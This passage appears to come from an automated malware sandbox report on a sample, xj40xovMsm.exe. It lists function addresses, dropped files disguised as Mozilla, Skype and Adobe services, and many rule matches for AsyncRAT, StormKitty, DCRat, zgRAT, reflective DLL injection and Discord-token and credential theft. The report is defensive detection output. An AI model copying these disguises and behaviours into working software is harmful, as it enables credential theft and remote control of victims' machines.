                      Source: C:\Windows\System32\relog.exeCode function: 53_2_00007FF7AE485AC053_2_00007FF7AE485AC0
                      Source: C:\Windows\System32\relog.exeCode function: 55_2_00007FF7C07C29C855_2_00007FF7C07C29C8
                      Source: C:\Windows\System32\relog.exeCode function: 55_2_00007FF7C07D09EC55_2_00007FF7C07D09EC
                      Source: C:\Windows\System32\relog.exeCode function: 55_2_00007FF7C07C32A855_2_00007FF7C07C32A8
                      Source: C:\Windows\System32\relog.exeCode function: 55_2_00007FF7C07C5AC055_2_00007FF7C07C5AC0
                      Source: C:\Windows\System32\relog.exeCode function: 55_2_00007FF7C07E42F855_2_00007FF7C07E42F8
                      Source: C:\Windows\System32\relog.exeCode function: 55_2_00007FF7C07E0B2455_2_00007FF7C07E0B24
                      Source: C:\Windows\System32\relog.exeCode function: 55_2_00007FF7C07D935855_2_00007FF7C07D9358
                      Source: C:\Windows\System32\relog.exeCode function: 55_2_00007FF7C07E14D855_2_00007FF7C07E14D8
                      Source: C:\Windows\System32\relog.exeCode function: 55_2_00007FF7C07CFCE855_2_00007FF7C07CFCE8
                      Source: C:\Windows\System32\relog.exeCode function: 55_2_00007FF7C07D243055_2_00007FF7C07D2430
                      Source: C:\Windows\System32\relog.exeCode function: 55_2_00007FF7C07C2DBC55_2_00007FF7C07C2DBC
                      Source: C:\Windows\System32\relog.exeCode function: 55_2_00007FF7C07D8D3455_2_00007FF7C07D8D34
                      Source: C:\Windows\System32\relog.exeCode function: 55_2_00007FF7C07D26C855_2_00007FF7C07D26C8
                      Source: C:\Windows\System32\relog.exeCode function: 55_2_00007FF7C07D461855_2_00007FF7C07D4618
                      Source: C:\Windows\System32\relog.exeCode function: 55_2_00007FF7C07D3FC855_2_00007FF7C07D3FC8
                      Source: C:\Windows\System32\relog.exeCode function: 55_2_00007FF7C07E2FD855_2_00007FF7C07E2FD8
                      Source: C:\Windows\System32\relog.exeCode function: 55_2_00007FF7C07E077455_2_00007FF7C07E0774
                      Source: C:\Windows\System32\relog.exeCode function: 55_2_00007FF7C07C20C055_2_00007FF7C07C20C0
                      Source: C:\Windows\System32\relog.exeCode function: 55_2_00007FF7C07C78F055_2_00007FF7C07C78F0
                      Source: C:\Windows\System32\relog.exeCode function: 55_2_00007FF7C07DF10055_2_00007FF7C07DF100
                      Source: C:\Windows\System32\relog.exeCode function: 55_2_00007FF7C07E382C55_2_00007FF7C07E382C
                      Source: C:\Windows\System32\relog.exeCode function: 55_2_00007FF7C07C887855_2_00007FF7C07C8878
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: String function: 00007FF68A183C1C appears 50 times
                      Source: C:\Windows\System32\relog.exeCode function: String function: 00007FF7C07C3C1C appears 50 times
                      Source: C:\Windows\System32\relog.exeCode function: String function: 00007FF6AA333C1C appears 50 times
                      Source: C:\Windows\System32\relog.exeCode function: String function: 00007FF7AE483C1C appears 50 times
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeCode function: String function: 00007FF7C9B03C1C appears 50 times
                      Source: zbi[1].exe.0.drStatic PE information: Data appended to the last section found
                      Source: Service_Mozilla.exe.0.drStatic PE information: Data appended to the last section found
                      Source: Service_Skype.exe.0.drStatic PE information: Data appended to the last section found
                      Source: Service_com.adobe.dunamis.exe.0.drStatic PE information: Data appended to the last section found
                      Source: Service_Adobe.exe.0.drStatic PE information: Data appended to the last section found
                      Source: Service_Microsoft.exe.0.drStatic PE information: Data appended to the last section found
                      Source: xj40xovMsm.exeBinary or memory string: OriginalFilename vs xj40xovMsm.exe
                      Source: xj40xovMsm.exe, 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameServices.exe: vs xj40xovMsm.exe
                      Source: xj40xovMsm.exe, 00000000.00000003.1688399097.0000020234F26000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBitcoinMiner.exeV vs xj40xovMsm.exe
                      Source: xj40xovMsm.exe, 00000000.00000003.1761409496.0000020236B8F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBitcoinMiner.exeV vs xj40xovMsm.exe
                      Source: xj40xovMsm.exe, 00000000.00000003.1761409496.0000020235D60000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameServices.exe: vs xj40xovMsm.exe
                      Source: xj40xovMsm.exe, 00000019.00000003.2608682237.00000229BC80F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBitcoinMiner.exeV vs xj40xovMsm.exe
                      Source: xj40xovMsm.exe, 00000019.00000003.2408351549.00000229BABA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBitcoinMiner.exeV vs xj40xovMsm.exe
                      Source: xj40xovMsm.exe, 00000019.00000003.2383701645.00000229B8D87000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameServices.exe: vs xj40xovMsm.exe
                      Source: xj40xovMsm.exe, 00000019.00000000.2337972315.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameServices.exe: vs xj40xovMsm.exe
                      Source: xj40xovMsm.exe, 00000019.00000003.2608682237.00000229BB9E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameServices.exe: vs xj40xovMsm.exe
                      Source: xj40xovMsm.exeBinary or memory string: OriginalFilenameServices.exe: vs xj40xovMsm.exe
                      Source: xj40xovMsm.exeBinary or memory string: OriginalFilenameBitcoinMiner.exeV vs xj40xovMsm.exe
                      Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                      Source: dump.pcap, type: PCAPMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                      Source: dump.pcap, type: PCAPMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 2.2.explorer.exe.8b90000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 2.0.explorer.exe.8cb0000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 14.0.5087.tmp.update.exe.6f0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                      Source: 14.0.5087.tmp.update.exe.6f0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                      Source: 2.2.explorer.exe.8cb0000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 2.2.explorer.exe.8cb0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 2.0.explorer.exe.8b90000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 2.2.explorer.exe.f3c0000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 2.2.explorer.exe.c350000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 2.0.explorer.exe.c350000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 10.0.4BC4.tmp.Client.exe.ac0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                      Source: 10.0.4BC4.tmp.Client.exe.ac0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                      Source: 10.0.4BC4.tmp.Client.exe.ac0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                      Source: 10.0.4BC4.tmp.Client.exe.ac0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
                      Source: 2.0.explorer.exe.8b90000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 19.0.5E16.tmp.aaa.exe.620000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                      Source: 39.0.jqnnpe.exe.230000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                      Source: 39.0.jqnnpe.exe.230000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                      Source: 39.0.jqnnpe.exe.230000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                      Source: 6.0.4336.tmp.Server.exe.190000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                      Source: 6.0.4336.tmp.Server.exe.190000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                      Source: 6.0.4336.tmp.Server.exe.190000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                      Source: 6.0.4336.tmp.Server.exe.190000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 6.0.4336.tmp.Server.exe.190000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                      Source: 24.2.svchost.exe.3a15198.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                      Source: 24.2.svchost.exe.3a15198.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                      Source: 24.2.svchost.exe.3a15198.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                      Source: 24.2.svchost.exe.3a15198.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
                      Source: 14.2.5087.tmp.update.exe.2aa51fc.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                      Source: 14.2.5087.tmp.update.exe.2aa51fc.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                      Source: 24.2.svchost.exe.6c60000.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                      Source: 2.2.explorer.exe.8b90000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 24.2.svchost.exe.6c60000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                      Source: 2.0.explorer.exe.8cb0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 2.2.explorer.exe.c350000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 2.0.explorer.exe.c350000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 24.2.svchost.exe.3a15198.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                      Source: 24.2.svchost.exe.3a15198.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                      Source: 24.2.svchost.exe.3a15198.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                      Source: 24.2.svchost.exe.3a15198.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
                      Source: 14.2.5087.tmp.update.exe.2aa51fc.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                      Source: 2.2.explorer.exe.f3c0000.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 00000018.00000002.3189493490.000000000511F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000018.00000002.3214014251.0000000006C60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                      Source: 00000018.00000002.3188525129.0000000005100000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000018.00000002.3174046241.0000000003A15000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                      Source: 00000018.00000002.3152328073.00000000029C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000002.00000002.3156915026.0000000008CB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 00000013.00000002.3142832732.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                      Source: 0000000E.00000002.2095704106.0000000002A98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                      Source: 00000012.00000002.2045157680.0000000000787000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 0000002D.00000002.2707163319.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000013.00000002.3187954223.000000001B234000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                      Source: 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                      Source: 00000002.00000000.1786621795.0000000008CB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 0000000E.00000000.1898904976.00000000006F2000.00000002.00000001.01000000.00000013.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                      Source: 0000000E.00000002.2061125065.0000000000E39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 00000018.00000002.3152328073.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                      Source: 00000018.00000002.3152328073.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 0000000A.00000000.1890364340.0000000000AC2000.00000002.00000001.01000000.00000010.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                      Source: 0000002D.00000002.2773682295.0000000005D77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000002.00000000.1786520032.0000000008B90000.00000020.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 00000009.00000002.2874806986.0000000002901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                      Source: 00000018.00000002.3191349230.000000000515B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000006.00000002.3152347475.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                      Source: 0000000E.00000002.2095704106.000000000294D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                      Source: 0000000E.00000002.2095704106.000000000294D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 0000000A.00000002.2583636643.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                      Source: 00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                      Source: 00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                      Source: 00000018.00000002.3136390098.00000000008EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000027.00000000.2525684288.0000000000277000.00000002.00000001.01000000.0000001B.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                      Source: 00000002.00000002.3156274373.0000000008B90000.00000020.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 00000002.00000000.1790427329.000000000C350000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 00000018.00000002.3152328073.000000000283E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000012.00000002.2071994361.0000000002261000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                      Source: Process Memory Space: 4336.tmp.Server.exe PID: 5720, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                      Source: Process Memory Space: 4336.tmp.Server.exe PID: 5720, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                      Source: Process Memory Space: 476D.tmp.Server.exe PID: 420, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                      Source: Process Memory Space: 4BC4.tmp.Client.exe PID: 7244, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                      Source: Process Memory Space: 5087.tmp.update.exe PID: 7408, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                      Source: Process Memory Space: 5087.tmp.update.exe PID: 7408, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: Process Memory Space: 53A5.tmp.update.exe PID: 7508, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: Process Memory Space: 5E16.tmp.aaa.exe PID: 7640, type: MEMORYSTRMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                      Source: Process Memory Space: svchost.exe PID: 7952, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                      Source: Process Memory Space: svchost.exe PID: 7952, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                      Source: Process Memory Space: svchost.exe PID: 7952, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: Process Memory Space: jqnnpe.exe PID: 5184, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                      Source: Process Memory Space: svchost.exe PID: 796, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                      Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                      Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe, type: DROPPEDMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                      Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
